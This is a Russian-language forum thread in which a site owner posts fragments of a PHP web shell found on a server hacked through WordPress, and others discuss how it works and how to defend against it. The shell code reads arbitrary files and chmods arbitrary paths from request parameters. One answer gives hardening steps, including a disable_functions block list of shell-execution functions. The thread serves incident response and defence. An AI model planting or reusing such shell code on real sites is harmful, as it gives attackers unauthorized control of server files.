Chmod через веб скрипт?

Question

[Kakax]

Имеется веб сервер на апаче и пхп, isp. Не давно был взломан через вп. В итоге там появился очень интересный скрипт. С помощью скрипта можно листать по дерикотям, если не ограничивает параметр аппача open_basedir то вообще по всему серваку. В итоге становится понятно что это важный параметр) 2ое с чего ах.. через него можно менять права chmod на любые файлы, закачивать скачивать ренеймить и тд. Даже если на нем права 444..под любым пользователем.

Как оно работает? Как защитится от такой штуки в дальнейшем? Советы в данной ситуации, что почистить?. ТП ДЦ разводит руками.:(

Comments

[Талян]

интересно) даже если www-data был бы в группе root то 444 не мог бы редактировать. Подписываюсь!

[Дмитрий]

Ну а сам файл раскодировать и посмотреть?

[Kakax]

Дмитрий, сам файл не закодирован. я не нашел своими познаниями ничего криминального.

[Талян]

Kakax, покажите нам если не секрет. Лишнее, чего опасаетесь - затрите. Дюже интересно.

[Дмитрий]

Kakax, поиск по файлу chmod все покажет

[Sasha333]

Kakax, поддерживаю Таляна, больно интересно взглянуть на то, как скрипт может преодалеть все права. Если тем более он не закодирован, так ответ как защититься прийдет быстрей в разы.

[Kakax]

Талян, Дмитрий, Sasha333, Постараюсь, куски по chmod

<?php
@session_start();
@set_time_limit(0);

------------------------------------------
echo $_GET['filesrc'];
echo '</tr></td></table><br />';
echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
if($_POST['opt'] == 'chmod'){
if(isset($_POST['perm'])){
if(chmod($_POST['path'],$_POST['perm'])){
echo '<font color="green">Chmod Success..</font><br />';
}else{
echo '<font color="red">Chmod Gagal..</font><br />';
}
}
echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Save" />
</form>';

------------------------------------------

function perms($file){
$perms = fileperms($file);

if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}

// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));

// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));

// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));

return $info;
}
?>

[Дмитрий]

Kakax, обычный самый

[Kakax]

Дмитрий, ?

[Дмитрий]

Kakax, ну не какой то хитрый способ, а самый обычный

[Kakax]

m0ze, да походу именно именно он.

[Kakax]

Так подскажите, че настроить то??

Answer 1

[Константин]

к сожалению защита от подобных атак может добавлять неудобства в разработке и тестировании скриптов/сайтов, но приловчиться можно. Я делаю так:
1) устанавливаю на каждый сайт переменную "open_basedir" равной каталогу пользователя или папки с сайтом. Для каждого сайта значения устанавливаю через конфиг пула php-fpm.
Если php работает как модуль apache, тогда это делается в конфиге виртуального хоста вот такими строками:

php_admin_value open_basedir "/var/www:/tmp"
php_admin_value disable_functions "popen, pclose, exec, passthru, shell_exec, system, proc_open, proc_close, mail, symlink"

Глобальное значение в php.ini щас стоит: open_basedir = "/var/www:/tmp" на всякий случай.

2) устанавливаю глобальное значение переменной "disable_functions" в php.ini, у меня щас такое:

disable_functions = "get_defined_constants,apache_get_modules,virtual,getmyinode,apache_get_version,apache_getenv,ini_restore,-openlog,-syslog,highlight_file,show_source,symlink,-ini_get_all,-phpinfo,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,exec,shell_exec,system,passthru,proc_open,popen,proc_close,proc_get_status,proc_nice,proc_terminate,leak,listen,chown,chgrp,apache_note,apache_setenv,closelog,debugger_off,debugger_on,define_sys,getmyuid,getmypid,diskfreespace,dl,posix_ctermid,posix_getcwd,posix_getegid,posix_geteuid,posix_getgid,posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid,posix,_getppid,posix_getpwnam,posix_getpwuid,posix_getrlimit,posix_getsid,posix_getuid,posix_isatty,posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid,posix_setpgid,posix_setsid,posix_setuid,posix_times,posix_ttyname,posix_uname,expose_php,curl_exec,curl_multi_exec,-parse_ini_file,eval,link,putenv,-pack,gzinflate,gzuncompress"

Если перед функцией стоит дефис, например "-ini_get_all", значит я хочу временно отключить блокировку данной функции, т.к. блокироваться будет полностью строка "-ini_get_all", а такой не существует.
Если при работе сайта/скрипта что то не работает, то смотрите error.log, там должны быть ошибки.
Если для какого то сайта нужно изменить значение disable_functions, то меняю его для отдельного сайта. Или усиливаю защиту блокируя дополнительно функции или наоборот уменьшаю.

3) Т.к. у меня php работает как php-fpm, то под каждый сайт создаю отдельного пользователя и пул в php-fpm запускается от него.
Если php работает как модуль apache, то это делается через модуль mpm-itk.

<IfModule mpm_itk_module>
    AssignUserId user1 user1
</IfModule>

4) Для apache устанавливаю модуль ModSecurity (mod_security2). Это веб фаервол. Он блокирует подозрительные http запросы ещё до того, как они попадут к скрипту/cms. Работает очень хорошо. Иногда даже слишком, что приходится отключать часть правил или полностью для какого то сайта.

Но и выполнение этих 4 пунктов не гарантирует полную безопасность сайта. Один сайт клиента был взломан даже с такими защитами.

Comments

[Kakax]

Спасибо. Отличный развёрнутый ответ. +100500 к карме) Пока не буду отмечать решением может кто еще что предложит...

Answer 2

[Sasha333]

Пробовали заливать wp не от рута? Допустим создали в этом же isp юзера с ограниченными правами, от него инсталлировали wp, тогда тоже этот шелл пускает ко всем дирректориям даже за выход прав этого ftp юзера?

Comments

[Талян]

но ведь исполнение идет не от прав скрипта а от того, то его исполняет, а это www-data. Хотя может я ошибаюсь. Например я ничего не знаю про nginx

[Sasha333]

Талян, я тоже не сказать, что сильно разбираюсь в серверной части, но на сколько знаю права исполнения файла ограничиваются именно тем, кто его залил. Если файл исполняется дальше своих прав, это уже похоже на уязвимость в железе или серверном по. В текущем варианте больше сколоняюсь к тому, что wp залит от рута, через какой нибудь плагин или шабон залили shell обыкновенный.

[Kakax]

Владелец был выставлен не рут. от обычного пользователя. да по всему серваку можно лазить если нет open_basedir в апаче.

[Kakax]

Sasha333, в данный момент я вообще уже ради интереса создал нового пользователя. пульнул туда скрипт. и играюсь. разницы нет никакой, все доступно.

[Талян]

Kakax,

разницы нет никакой, все доступно.

мда странно) я порой cd /var/log не могу от себя выполнить, а тут такое. Очень странные дела!) Требую расследования

[Дмитрий]

Да хостинг видать такой

[Дмитрий]

Глянуть оригинальные ли .htaccess